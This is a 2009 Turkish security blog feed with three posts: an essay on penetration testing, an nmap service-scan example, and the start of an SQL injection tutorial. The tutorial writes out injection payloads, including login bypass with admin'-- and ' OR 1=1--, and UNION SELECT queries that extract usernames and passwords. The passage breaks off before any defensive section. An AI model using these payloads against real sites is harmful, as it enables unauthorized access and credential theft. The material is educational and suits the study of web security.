Yapmak değil, yıkmak&lt;br /&gt;          o Kullanmak değil, Suistimal etmek&lt;br /&gt;    * Derinlemesine Bilgi&lt;br /&gt;    * Paranoya&lt;br /&gt;    * Tutku&lt;br /&gt;    * İletişim Becerisi&lt;br /&gt;    * Okuma&lt;br /&gt;&lt;br /&gt;Penetration Testing, Güvenlik Uzmanı ve Vulnerability Assessment&lt;br /&gt;&lt;br /&gt;Yazının detaylarına geçmeden önce bazı terimleri temiz şekilde ifade etmek gerekir.&lt;br /&gt;&lt;br /&gt;Penetration Testing (Pen Test)&lt;br /&gt;Bir sistemi dışarıdan genelde ekstra hiçbir ekstra bilgi sahibi olmadan güvenlik açıklarına karşı test etmek ve bu açıkları mümkün olduğu kadar exploit etmek.&lt;br /&gt;&lt;br /&gt;Vulnerability Assessment (VA)&lt;br /&gt;&lt;br /&gt;Aynı penetration testing gibidir ama açıklar exploit edilmez, burada dikkat edilmesi gereken bir nokta var ki Vulnerability Assessment daha çok false positive verecektir ve açığın gerçek etkisini ortaya koymayabilir.&lt;br /&gt;&lt;br /&gt;Mesela test edilen sistemdeki Buffer Overflow açığı olan bir SMTP server varsa ama karşıdaki sistem x64 ise ve bu açık x64 da geçerli değilse Vulnerability Assessment bunu açık olarak direk kabul edecektir ama gerçekte bu açık exploit edilemeyeceğinden direk bir risk taşımamaktır. Buna rağmen eski versiyon bir yazılım bulundurmak genelde iyi bir fikir olmadığından VA’ ın sonuçları her şekilde işe yarayacaktır.&lt;br /&gt;&lt;br /&gt;Güvenlikçi / Güvenlik Uzmanı&lt;br /&gt;&lt;br /&gt;Güvenlik Uzmanı çok geniş bir terim genelde şu iki anlamda kullanılır:&lt;br /&gt;&lt;br /&gt;    * Bir sistemin güvenliğini sağlamadan sorumlu kişi.&lt;br /&gt;    * Güvenlik işini bilen kişi.&lt;br /&gt;&lt;br /&gt;İroniktir ki genelde güvenlikçikler sistemleri korurlar Penetration Testerlar gibi saldırmazlar ama bu grubun ikisi de Güvenlikçi, Güvenlik Mühendisi, Güvenlik Uzmanı diye geçebilir.&lt;br /&gt;&lt;br /&gt;Ek olarak bazı güvenlikçiler kendi sistemlerini test etmek için kendi içlerinden kendi sistemlerine saldırganmış gibi de test edebilirler. Bu kişiler genelde iki rolüde üstlenmiş olurlar. Not düşmek lazım bu aynı kendi programınızda “bug” aramak gibidir, yani muhtemelen iyi sonuçlar vermeyecektir. Yazılımın sahibi olarak yazılımın zaten doğru oldu varsayımı ile yola çıktığınızdan genelde önünüzdeki sorunları bile göremeyeceksinizdir.&lt;br /&gt;Güvenlikçi Olarak Düşünmek&lt;br /&gt;&lt;br /&gt;Polisiye filmlerdeki klasik muhabbetlerden biri “profiling” dir yani saldırganın profilini çıkartabilmek. Buradaki en büyük klişe ise bir dedektifin saldırgan gibi düşünmesidir. Ne kadar klişe olsa da bu gerçekten saldırgana ulaşmanın en iyi yoludur ve güvenlikçi de aynı periyoddan çok daha güçlü şekilde geçer.&lt;br /&gt;&lt;br /&gt;Çünkü bir polis gerçekte saldırgana ulaşmak için kimseyi öldürmez ama güvenlikçi siteye girer, exploit eder, database’ i indirir, reverse shell’ ine erişir. Gerçekten suçu işler, doruğa çıkar ve iner. Bu gereksinim güvenlikçinin içerisinde saldırgan kimliğinin bire bir yaşamasını sağlar.&lt;br /&gt;&lt;br /&gt;Bilinen bir gerçek bir çok büyük güvenlik firmasında çalışan kişilerin eski suçlu hackerlar olduğudur.&lt;br /&gt;&lt;br /&gt;Örnek isterseniz Kevin Mitnick’ in kendisi ya da eski @stake’ in L0pth Heavy Industries hacker grubunda gelen tayfası güzel bir örnek olacaktır. Bu örneklerin yanında diğer bir çok benzer güvenlik sektöründe çalışan kişinin de karanlık bir mazisi vardır. Bu arada not düşmek gerekir ki bu furya değişiyor, yazının ilerisinde ona değineceğim.&lt;br /&gt;&lt;br /&gt;O zaman güvenlikçi saldırgan gibi düşünmelidir, Saldırganın motivasyonu nedir?&lt;br /&gt;&lt;br /&gt;    * Para,&lt;br /&gt;      Karşıdaki sistemi kırıp elde edeceği getiri (Kredi Kartı vs.)&lt;br /&gt;    * Şan / Şöhret,&lt;br /&gt;      Cyber Grafiti veya benzeri gösteriler, Saldırgan sistemi kırabildiğini tüm dünyaya gösterir&lt;br /&gt;    * Ego Tatmini,&lt;br /&gt;      Saldırgan karşıdaki sistemi kırıp kendisinin sistemin geliştiricilerinden daha iyi olduğuna inandırır, ek olarak kırılamayanı kırmış yeni bir şey yapmıştır.&lt;br /&gt;&lt;br /&gt;Peki aynı durumda penetration tester ne yapmaktadır, onun motivasyonu nedir?&lt;br /&gt;&lt;br /&gt;    * Para,&lt;br /&gt;      Sistemi kırmak, kontrolleri geçmek güvenlikçinin pozisyonun koruması ya da daha iyi bir tester olup daha çok maaş alması demek.&lt;br /&gt;    * Şan / Şöhret,&lt;br /&gt;      Konu ar-ge olunca durum tamamen aynıdır, güvenlikçi yayınladığı yeni bir bir makale, araştırma yazısı ile o çevrede ünlenecektir, aynı şekilde saldırının başarısı ile de firma ya da kendi içerisinde bulunduğu grup içerisinde ünlenecektir.&lt;br /&gt;    * Ego Tatmini,&lt;br /&gt;      Güvenlikçi bu noktada saldırgan ile birebir aynı duyguları paylaşır.&lt;br /&gt;&lt;br /&gt;Görüldüğü üzere güvenlikçi ile saldırgan tamamen aynı duygular içerisindedir, dolayıyla penetration tester’ lar dünyadaki saldırgan rolünü direk olarak oynayan sayılı mesleklerin birini icra etmektedirler. &lt;br /&gt;&lt;br /&gt;Yazar : &lt;a href="http://ferruh.mavituna.com"&gt;Ferruh MAVİTUNA&lt;/a&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2887209772609553434-5772192745104844679?l=mrtskr.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/5772192745104844679/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://mrtskr.blogspot.com/2009/06/penetration-tester-olmak.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/5772192745104844679'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/5772192745104844679'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/2009/06/penetration-tester-olmak.html' title='Penetration Tester Olmak'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2887209772609553434.post-8412393151038341168</id><published>2009-06-21T04:34:00.000-07:00</published><updated>2009-06-26T01:18:57.944-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='nmap'/><category scheme='http://www.blogger.com/atom/ns#' term='guvenlik'/><category scheme='http://www.blogger.com/atom/ns#' term='kendimden'/><title type='text'>Sistemdeki Çalışan Servislerin Tespit Edilmesi</title><content type='html'>Merhaba&lt;br /&gt;İnternetteki veya Kendi Networkunuzdaki Servislerin Tespit Edilmesini İstiyorsanız Nmap'in -sV Parametresini Kullanabilirsiniz.&lt;br /&gt;Örnek Komut ; &lt;br /&gt;&lt;br /&gt;root@bt# nmap -sV ipno&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;Çıktı ;&lt;br /&gt;&lt;br /&gt;Starting Nmap 4.85BETA8 ( http://nmap.org ) at 2009-06-21 14:31 GTB Yaz Saati&lt;br /&gt;Interesting ports on ip (ip):&lt;br /&gt;Not shown: 985 closed ports&lt;br /&gt;PORT     STATE    SERVICE     VERSION&lt;br /&gt;21/tcp   open     ftp         ProFTPD 1.3.1&lt;br /&gt;22/tcp   open     ssh         OpenSSH 4.3 (protocol 2.0)&lt;br /&gt;25/tcp   open     smtp        qmail smtpd&lt;br /&gt;53/tcp   open     domain      ISC BIND 9.3.3rc2&lt;br /&gt;80/tcp   open     http        Apache httpd 2.2.3 ((CentOS))&lt;br /&gt;106/tcp  open     pop3pw      poppassd&lt;br /&gt;110/tcp  open     pop3        Courier pop3d&lt;br /&gt;143/tcp  open     imap        Courier Imapd (released 2004)&lt;br /&gt;443/tcp  open     ssl/http    Apache httpd 2.2.3 ((CentOS))&lt;br /&gt;465/tcp  open     ssl/smtp    qmail smtpd&lt;br /&gt;993/tcp  open     ssl/imap    Courier Imapd (released 2004)&lt;br /&gt;995/tcp  open     ssl/pop3    Courier pop3d&lt;br /&gt;1720/tcp filtered H.323/Q.931&lt;br /&gt;3306/tcp open     mysql       MySQL 5.0.45&lt;br /&gt;8443/tcp open     http        Apache httpd&lt;br /&gt;Service Info: Host: localhost.localdomain; OS: Unix&lt;br /&gt;&lt;br /&gt;Service detection performed. Please report any incorrect results at http://nmap&lt;br /&gt;org/submit/ .&lt;br /&gt;Nmap done: 1 IP address (1 host up) scanned in 44.86 seconds&lt;br /&gt;&lt;br /&gt;İyi Çalışmalar.&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2887209772609553434-8412393151038341168?l=mrtskr.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/8412393151038341168/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://mrtskr.blogspot.com/2009/06/sistemdeki-calsan-servislerin-tespit.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/8412393151038341168'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/8412393151038341168'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/2009/06/sistemdeki-calsan-servislerin-tespit.html' title='Sistemdeki Çalışan Servislerin Tespit Edilmesi'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2887209772609553434.post-2416236960743428913</id><published>2009-06-19T09:44:00.000-07:00</published><updated>2009-06-19T10:41:33.808-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='guvenlik'/><category scheme='http://www.blogger.com/atom/ns#' term='kendimden'/><category scheme='http://www.blogger.com/atom/ns#' term='sqlinjection'/><title type='text'>SQL Injection Attacks &amp; Security</title><content type='html'>SQL Injection Attacks &amp; Security&lt;br /&gt;&lt;br /&gt;İçindekiler :&lt;br /&gt;1.  Giriş&lt;br /&gt;2.  SQL Injection Nedir ? Neden Kaynaklanır ? Etkisi Nedir ?&lt;br /&gt;3.  Açığı Basitçe Exploit Etmek&lt;br /&gt;    &gt;&gt; Login Bypassing&lt;br /&gt;4.  SQL Injection Açığı Bulmak&lt;br /&gt;    &gt;&gt; String Veri&lt;br /&gt;    &gt;&gt; Numerik Veri&lt;br /&gt;4.  SQL’de Bazı İfadeler ve Kullanımları&lt;br /&gt;    &gt;&gt; SELECT İfadesi&lt;br /&gt;    &gt;&gt; INSERT İfadesi&lt;br /&gt;    &gt;&gt; UPDATE İfadesi&lt;br /&gt;    &gt;&gt; DELETE İfadesi&lt;br /&gt;5.  SQL Injection Tipleri&lt;br /&gt;    &gt;&gt; URL Injection&lt;br /&gt;    &gt;&gt; Form Injection&lt;br /&gt;    &gt;&gt; Blind Injection&lt;br /&gt;6.  UNION Operatörü&lt;br /&gt;7.  ODBC Hatalarından Faydalanarak Açığı Exploit Etmek (Sadece MSSQL)&lt;br /&gt;    &gt;&gt; Tablo ve Kolonları Öğrenmek&lt;br /&gt;    &gt;&gt; İşe Yarayan Bilgileri Almak&lt;br /&gt;    &gt;&gt; Kayıt İlerletme&lt;br /&gt;8.  Açığı Database Tiplerine Göre Exploit Etmek (MSSQL, Oracle)&lt;br /&gt;    &gt;&gt; MSSQL&lt;br /&gt;    &gt;&gt; Oracle&lt;br /&gt;9. SQL Injection Güvenliği&lt;br /&gt;10. Referanslar&lt;br /&gt;11. Bitiş&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;1.  Giriş&lt;br /&gt;SQL Injection, Günümüz Web Uygulamalarında Sıkça Rastlanan Güvenlik Açıklarından Birisidir. Bu Dökümanda Okuyuculara Bir Saldırgan Gibi Düşünüp; SQL Injection Açıklarını Nasıl Sömürdüğünü ve Bu Saldırılara Karşı Alınabilecek Önlemler Anlatılmaktadır.&lt;br /&gt;&lt;br /&gt;2. SQL Injection Nedir ? Neden Kaynaklanır ? Etkisi Nedir ?&lt;br /&gt;• SQL Injection Nedir ?&lt;br /&gt;            Injection Kelime Anlamıyla Eklemek, Enjekte Etmek Anlamına Gelmektedir. SQL Injection İse SQL Sorgularının Dışardan Müdahale İle Manipule Edilmesiyle Zararlı Verilerin Eklenmesidir.Dynamic Web Applications (Dinamik Web Uygulamalarında) Genelde Bir Web Uygulaması, Arka planda Çalışan Bir Veritabanı ve Bu Veritabanıyla Web Uygulaması Arasında Bilgi Alışverişini Sağlayan SQL Komutları Vardır. Web Uygulamalarında Herhangi Bir Form veya URL Aracılığıyla Bilgi Alışverişi Yapılır. Bu İşlem Yapılırken Web Uygulamasıyla Etkileşimli Veritabanı Üzerinde Veri Alışverişi İçin SQL Sorguları Kullanılır. Bu SQL Sorgularıyla Veritabanına Veri Eklenir, Güncellenir, Silinir. Saldırgan Bu SQL Sorgularını Değiştirerek veya SQL Sorgusuna Kendi Zararlı Sorgusunu Ekleyerek Veritabanı Üzerinde Zararlı Sorgular Çalışır. Tabi Sadece Veritabanından Bilgi Çekmek, Eklemek Amacıyla Kullanılmaz. Sistem, Veritabanı ve Uygulama Yetkilerine Göre Sistemi Tamamen Devredışı Bırakabileği Gibi Aynı Ağda İnternete Erişimi Olan (Olmayan) Makineleri Ele Geçirebilir. ve Saldırgan Bu Makineleri Kullanarak İstediği Saldırıyı Yapabilir.&lt;br /&gt;• Neden Kaynaklanır ?&lt;br /&gt;             Bu Açıklar Web Uygulamalarındaki Kodlama Hataları Sonucu Oluşmaktadır. Zararlı Karakterlerin Filtrelenmemesi, Değişkenlerin Yanlış Atanması, Webmaster Üşengeçliği vs.&lt;br /&gt; &lt;br /&gt;3. Açığı Basitçe Exploit Etmek&lt;br /&gt;Arama Formlarında Genellikle Form'dan Girilen Değerler Database'de SQL Sorguları Yardımıyla Karşılaştırılarak Benzerleri veya Aynıları Sayfaya HTML Görünümlü Olarak Yansıtılır. Bu Arama Kutusunu Kullanarak Database'de Kitapları ZeroTolerance Yazarına Göre Arayacak Sorgu ;&lt;br /&gt;&lt;br /&gt;Select adi,yazar,fiyat From kitaplar where yazar='ZeroTolerance';&lt;br /&gt;&lt;br /&gt;Bu Sorgu Database'in Kitaplar Tablosundan adi,yazar,fiyat Kolonlarına Göre Listeleme Yapıyor. Fakat Where Koşulu İle Yazarın ZeroTolerance Olması İsteniliyor. Dolayısıyla Sayfada Yazarının ZeroTolerance Olduğu Kitaplar Adı ve Fiyatına Göre Yansıtılır. Saldırgan Kodlama Hatasından Faydalanarak Sorguyu Manipule Edebilir ve Veritabanı Yanıtlarını Kendi Lehine Çevirebilir. Saldırgan Sorguya ‘ Meta Karakterini ve Herhangi Bir String Ekleyerek Sorguya Müdahale Eder.&lt;br /&gt;&lt;br /&gt;Select adi,yazar,fiyat From kitaplar where yazar='O'ZeroTolerance'; &lt;br /&gt;&lt;br /&gt;Sorguda Sadece O 'ya Göre Veriler Alınıyor ZeroTolerance İse Sorgu Dışıdır Çünkü ‘ dan sonraki Komutları Kapsüllenmemiş Olarak Algılar. SQL ZeroTolerance'ı Kendi Yapısında Bulundurmadığı İçin Geçersiz Söz Dizimi Hatası Verecektir. &lt;br /&gt;&lt;br /&gt;Incorrect syntax near ‘ZeroTolerance’.&lt;br /&gt;Page.asp , Line 115&lt;br /&gt;Unclosed quotation mark before the character string ‘&lt;br /&gt;&lt;br /&gt;Saldırgan İstediği Hatayı Aldıktan Sonra Sorguyu Manipule Ettiğini Anlayacaktır ve Saldırısına Devam Edecektir. ' OR 1=1-- İle Devam Eder;&lt;br /&gt;&lt;br /&gt;Select adi,yazar,fiyat From kitaplar where yazar='ZeroTolerance 'OR 1=1--';&lt;br /&gt;&lt;br /&gt;Manipule Edilmiş (Düzenlenmiş) Sorgu Database'de True Dönecektir Çünkü 1 Her Zaman 1 e Eşittir ve Database'de Kitaplar Tablosundaki Bütün Verileri Sayfada Yansıtacaktır. (Buradaki Or veya Anlamında Kullanılmaktadır veya 1=1)&lt;br /&gt;&lt;br /&gt;• Login Bypassing&lt;br /&gt;Birçok Web Uygulaması Kullanıcı Kimlik Bilgilerini Depolamak, Oturum Açma Teşebbüsünü Doğrulamak İçin Basit SQL Sorguları Kullanırlar. Bu SQL Sorgular İcra Ettikleri Veritabanı Üzerinde Oturum Açma İşlemini Formlar Aracılığıyla Yapar.Bu Sorguya Örnek ;&lt;br /&gt;&lt;br /&gt;Select * From kullanicilar where kulladi=’zero’ and sifre =’tolerance’ &lt;br /&gt;&lt;br /&gt;Buradaki kulladi ve sifre Kolonlarında (Sırasıyla) zero ve tolerance Değerleri Varsa ve Aynı Karşılıklı Değerlerle Eşleşiyorsa Oturum Açma İşlemi Başarılıdır. Saldırgan Sorguyu Enjekte Etmek İçin Hem Kullanıcı Adı Hem de Şifre Form’larından Faydalanabilir. Eğer Saldırgan Kullanıcı Adının Admin Olduğunu Biliyorsa; Şifresiz Giriş Yapmaya Çalışacaktır. Giriş İçin Kullanıcı Adı Formuna admin’-- Eklemesi Yeterlidir.&lt;br /&gt;&lt;br /&gt;Select * from kullanicilar where kulladi =’admin’--‘ and sifre=’foo’&lt;br /&gt;&lt;br /&gt;SQL Dili -- ‘den Sonraki Komutları Comment (Yorum) Satırı Olarak Algılamaktadır. Dolayısıyla SQL Cümlesi Aşağıdaki Gibi Değişecektir.&lt;br /&gt;&lt;br /&gt;Select * From kullanicilar where kulladi =’admin’&lt;br /&gt;&lt;br /&gt;Saldırgan Admin Kullanıcı Adıyla “Şifresiz” Giriş Yapacaktır. (Burada Şifre Sorgulama Sorgusu Bypass Edilmiştir.)&lt;br /&gt;&lt;br /&gt;Fakat Saldırgan Veritabanındaki Kullanıcı Adı veya Adlarını Her Zaman Bilemez. Veritabanlarındaki İlk Kullanıcı Genelde En Üst Düzey Kullanıcıdır (Administrator, Root) Çünkü Bu Kullanıcı Elle Eklenmiş ve Uygulama Üzerinde Diğer Tüm Kullanıcılara Erişme Yetkisi Vardır. Şayet Sorgu Birden Fazla Kullanıcı Detaylarını Gösteriyorsa (ki Birçok Uygulamada Bu Vardır) Saldırgan Kullanıcı Bilgilerine (Özellikle Üst Yetkili Kullanıcılara) Ulaşmak İçin Açığı Farklı Bir Şekilde Exploit Etmeye Çalışacaktır. Daha Öncede Bahsettiğim Gibi ‘ OR 1=1-- Bu İşlem İçin Uygundur. (Bu Çoğaltılabilir ‘ OR ‘1’=’1’, ‘ OR ‘a’=’a’ ………) &lt;br /&gt;&lt;br /&gt;Select * From kullanicilar where kulladi=’’ OR 1=1--‘ and sifre=’foo’   | Sorgu -- ‘den Sonraki Cümleleri Yorum Satırı Olarak Kabul Edecektir ve Sorgu Veritabanına;&lt;br /&gt;&lt;br /&gt;Select * From kullanicilar where kulladi=’’ OR 1=1 Şeklinde Gönderilecektir.( ‘ OR 1=1 Kerametini Önceden Açıklamıştım.) Uygulama Bütün Kullanıcı Adlarını Sayfada Gösterecektir.&lt;br /&gt;&lt;br /&gt;4.  SQL Injection Açığı Bulmak&lt;br /&gt;SQL Injection Açıklarının Kodlama Hatalarından Meydana Geldiğini Söylemiştim. SQL Dilinde Veriler Genellikle İki Farklı Şekildedir. String (Dizi) ve Numerik Veri.&lt;br /&gt;&lt;br /&gt;• String Veri&lt;br /&gt;String Veriler Sorguya Dahil Edildiklerinde ( ‘veri’ ) Tek Tırnak İşaretleri Arasına Alınarak Kapsüllenir. SQL Atağı Yapılırken Tırnaklar Dışarı Atılarak ( ‘ OR 1=1-- )  Sorgu Manipule Edilir.&lt;br /&gt;• Numerik (Sayısal) Veri&lt;br /&gt;Genellikle Sayısal Veriler Sorguya Dahil Edildiklerinde Herhangi Bir Kapsülleme (Özel Karakter) Kullanılmaz. Sayısal Veriler Veritabanıyla Doğrudan İlişkilidir Sorguya Direk Dahil Edilirler ve Sorgularda Integer, Numeric, Logint Veri Tipli Kolonlardan Bilgi Alınır.&lt;br /&gt;&lt;br /&gt;Select id from kitaplar where id=1    | id’si 1 Olan Kitap Veritabanından Alındı.&lt;br /&gt;&lt;br /&gt;Numerik Verileri Exploit Etmek String’e Göre Zordur Fakat Çeşitli Yöntemleri Vardır. Bu Yöntemlerden Daha Sonra Bahsedeceğiz.&lt;br /&gt;&lt;br /&gt;4.  SQL’de Bazı İfadeler ve Kullanımları&lt;br /&gt;• SELECT İfadesi&lt;br /&gt;Veritabanından Veri Seçme İfadesidir. Kullanım Örnekleri Aşağıdaki Gibidir.&lt;br /&gt;&lt;br /&gt;             SELECT "kolon1" ,"kolon2" from "tabloadı" where "şart";&lt;br /&gt;             (Kolon Adları Belirtmeden Bütün Kolonlar İçin “*” Kullanılır)&lt;br /&gt;Where Koşulu İçin Gerekli İfadeler&lt;br /&gt;= Eşit&lt;br /&gt;&gt; Büyük&lt;br /&gt;&lt; Küçük&lt;br /&gt;&gt;= Büyük veya eşit&lt;br /&gt;&lt;= Küçük veya eşit&lt;br /&gt;&lt;&gt; Eşit değil&lt;br /&gt;LIKE Benzer, içeren&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;            Select adi, Fiyat From Kitaplar&lt;br /&gt;                  Where yazar LIKE 'Z%';&lt;br /&gt;&lt;br /&gt;            Select adi From Kitaplar&lt;br /&gt;                  where fiyat LIKE '40';&lt;br /&gt;&lt;br /&gt;            Select adi, Fiyat From Kitaplar&lt;br /&gt;                       where yazar LIKE 'Z%';&lt;br /&gt;&lt;br /&gt;• INSERT İfadesi&lt;br /&gt;Veritabanına (Tabloya) Yeni Veri Ekleme İfadesidir. Kullanım Örnekleri Aşağıdaki Gibidir.&lt;br /&gt;               Insert Into Tablo Adı (kolon1,kolon2,kolon3) Values (‘değer1’,’değer2’,’değer3’)&lt;br /&gt;               Insert Into  Kitaplar (adi,fiyat,yazar) Values (‘SQL’,’100’,’ZeroTolerance’) // SQL Adında 100 Lira                     Değerinde Yazarı ZeroTolerance Olan Kitap Ekler.&lt;br /&gt;• UPDATE İfadesi&lt;br /&gt;Veritabanında (Tabloda) Bulunan Verileri Değiştirmeyi Sağlayan İfadedir.&lt;br /&gt;   Update Tabloadı Set Kolonadı =’YeniDeğer’&lt;br /&gt;              Where “Şart”;&lt;br /&gt;   Update Kitaplar Set Yazar=’Zero’ &lt;br /&gt;              Where fiyat=’100’;  // Fiyatı 100 Olan Kitapların Yazarını Zero Yapar.&lt;br /&gt;• DELETE İfadesi&lt;br /&gt;Veritabanında (Tabloda) Var olan Kayıtları Silmeyi Sağlayan İfadedir.&lt;br /&gt;    Delete From Tabloadi where şart&lt;br /&gt;    Delete From Kitaplar where yazar=’ZeroTolerance’  Yazarı ZeroTolerance Olan Kitapları Siler.&lt;br /&gt;&lt;br /&gt;5.  SQL Injection Tipleri&lt;br /&gt;• URL Injection&lt;br /&gt;Injection Saldırısı Direk URL Üzerinden Yapılır. Numerik Verilerde Database’den Sayısal Değer Çekiliyorsa Sorguda Özel Karakterler Kullanılmaz. Örneğin ;&lt;br /&gt;http://kurban.com/default.asp?id=1    &lt;br /&gt;Saldırgan 1’den Sonra ‘ (Tırnak&gt; Shift + 2) İşaretini Eklediği Zaman Sorgu Değişecek ve Uygulama Hata Verecektir.&lt;br /&gt;• Form Injection&lt;br /&gt;Form Injection’lar Genellikle Login Bypassing Başlığında Yazıldığı Gibidir. Fakat Daha Sonraki Bölümlerde URL Injection’la Birlikte Form Injection’dada Uygulanabilecek Saldırı Tiplerini İnceleyeceğiz.&lt;br /&gt;&lt;br /&gt;• Blind Injection&lt;br /&gt;Sayfada Injection Açığı Var Fakat Hata Vermiyorsa veya Coder Tarafından Yönlendirilmiş Sayfaya Gidiyorsa Uygulamada Blind SQL Injection Açığı Vardır. ASCII, Substring (Oracle’da substr) Fonksiyonları Kullanılarak Database’den Veriler Çekilir.&lt;br /&gt;&lt;br /&gt;6.  UNION Operatörü&lt;br /&gt;Union Operatörü İki Tablodan Aynı Anda Veri Çekme İşleminde Kullanılır.&lt;br /&gt;&lt;br /&gt;İki Tablomuz Var Kitaplar ve Kullanıcılar Adında.&lt;br /&gt;Kitaplar (ID,Baslik,Yazar, Detay, Fiyat)&lt;br /&gt;Kullanicilar (ID, KullAdi, Sifre, Email)&lt;br /&gt;&lt;br /&gt;Baslik Kolonunun İçindeki Veriler ;&lt;br /&gt;Dijital Kale&lt;br /&gt;Aldatma Sanatı&lt;br /&gt;Büyük Umutlar&lt;br /&gt;&lt;br /&gt;Username Kolonunun İçindeki Veriler ;&lt;br /&gt;Admin&lt;br /&gt;ZeroTolerance&lt;br /&gt;&lt;br /&gt;Normalde &lt;br /&gt;&lt;br /&gt;Select Baslik From Kitaplar Sorgusu Yazıldığı Zaman Veritabanı  ;&lt;br /&gt;Dijital Kale&lt;br /&gt;Aldatma Sanatı&lt;br /&gt;Büyük Umutlar&lt;br /&gt;&lt;br /&gt;Verilerini Gösterecektir. Aynısı Kullanicilar Tablosu İçinde Geçerlidir&lt;br /&gt;&lt;br /&gt;Select KullAdi From Kullanicilar;&lt;br /&gt;Admin&lt;br /&gt;ZeroTolerance&lt;br /&gt;&lt;br /&gt;Fakat;&lt;br /&gt;&lt;br /&gt;Select Baslik From Kitaplar Union Select KullAdi From Kullanicilar;&lt;br /&gt;&lt;br /&gt;Sorgusu Veritabanına Gönderildiğinde Veritabanı Hem Kitaplar Tablosunun Baslik Kolonundaki Verileri Hem de Kullanicilar Tablosundaki KullAdi Verilerini Gösterecektir.&lt;br /&gt;&lt;br /&gt;Dijital Kale&lt;br /&gt;Aldatma Sanatı&lt;br /&gt;Büyük Umutlar&lt;br /&gt;Admin&lt;br /&gt;ZeroTolerance&lt;br /&gt;&lt;br /&gt;Üstteki Örnekle Union’ın Temel Olarak Ne İşe Yaradığı Anlatıldı. Fakat Saldırgan Union Komutunu Nasıl Kullanabilir ?&lt;br /&gt;&lt;br /&gt;Daha Önceden Açığı Basitçe Exploit Etmek Başlığı Altında &lt;br /&gt;&lt;br /&gt;Select adi,yazar,fiyat From kitaplar where yazar='ZeroTolerance';   Sorgusundan Bahsetmiştik. Saldırgan İkinci Sorgusunu Göndermek İçin Union Komutunu Kullanacaktır. Ve&lt;br /&gt;&lt;br /&gt;ZeroTolerance ‘ Union Select KullAdi,Sifre From Kullanicilar—&lt;br /&gt;&lt;br /&gt;Bu Sorguyla Veritabanı Kullanicilar Tablosundan Kulladi ve Sifre Kolonlarındaki Verileri Getirecektir.&lt;br /&gt;&lt;br /&gt;Eğer Orijinal Sorguda Üç Kolon Var ve Enjekte Edilen Sorguda İki Kolon Varsa Veritabanı Alttaki Gibi Bir Hata Döndürecektir.&lt;br /&gt;&lt;br /&gt;query block has incorrect number of result columns&lt;br /&gt;&lt;br /&gt;veya &lt;br /&gt;The number of columns in the two selected tables or queries of a union query do not match.&lt;br /&gt;&lt;br /&gt;Burada Saldırgan Kolon Sayısını Tutturmayı Deneyecektir. Bunun İçin Eğer Diğer Kolon Adlarını Biliyorsa Kolon Adını&lt;br /&gt;&lt;br /&gt;ZeroTolerance ‘ Union Select ID,KullAdi,Sifre From Kullanicilar&lt;br /&gt;&lt;br /&gt;Sorgusuyla Eşitleyip Cevabın True Dönmesini Sağlayacaktır. Şöyle Bir Durum Var ki Kolon Veri Tipleri Aynı Değilse Veritabanı Hata Verir. Genellikle ID Kolonu Sayısal Değerlere Sahiptir (1,100,1000 vs.) KullAdi ve Sifre Kolonları İse String Yapıya Sahiptir Sorguda Integer ve String Veriler Aynı Sorguya Alındıkları İçin Integer Veriler String Veriye Dönüştürülemeyeceğinden Veritabanı Aşağıdaki Gibi Hata Verecektir.&lt;br /&gt;&lt;br /&gt;expression must have same datatype as corresponding expression&lt;br /&gt;&lt;br /&gt;* Eğer Kolon Adları Bilinmiyorsa Saldırgan Kolon Adlarını Eşitlemek İçin Null (Boş) İfadeler Kullanırl&lt;br /&gt;&lt;br /&gt;ZeroTolerance ‘ Union Select null,null,null from Kullanicilar          (0,1,2,3,4 Gibi Sayısal Verilerde Olabilir)&lt;br /&gt;&lt;br /&gt;Bu Null Verilere Kullanılan Veritabanına Göre Çeşitli Değişkenler Yazılır @@version Gibi. MSSQL Server’larda @@version Değişkeni Server Versiyonunu (Bilgiler) Göstermektedir. Öyleyse Saldırgan Veritabanı Versiyonunu Öğrenmek İçin ;&lt;br /&gt;&lt;br /&gt;ZeroTolerance ‘ Union Select @@version,null,null From Kullanicilar Sorgusuyla Database Versiyonunu Öğrenebilir.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;7.  ODBC Hatalarından Faydalanarak Açığı Exploit Etmek (Sadece MSSQL)&lt;br /&gt;&lt;br /&gt;Eğer Saldırgan MSSQL Server Üzerindeki Veritabanına Saldırıyorsa ODBC 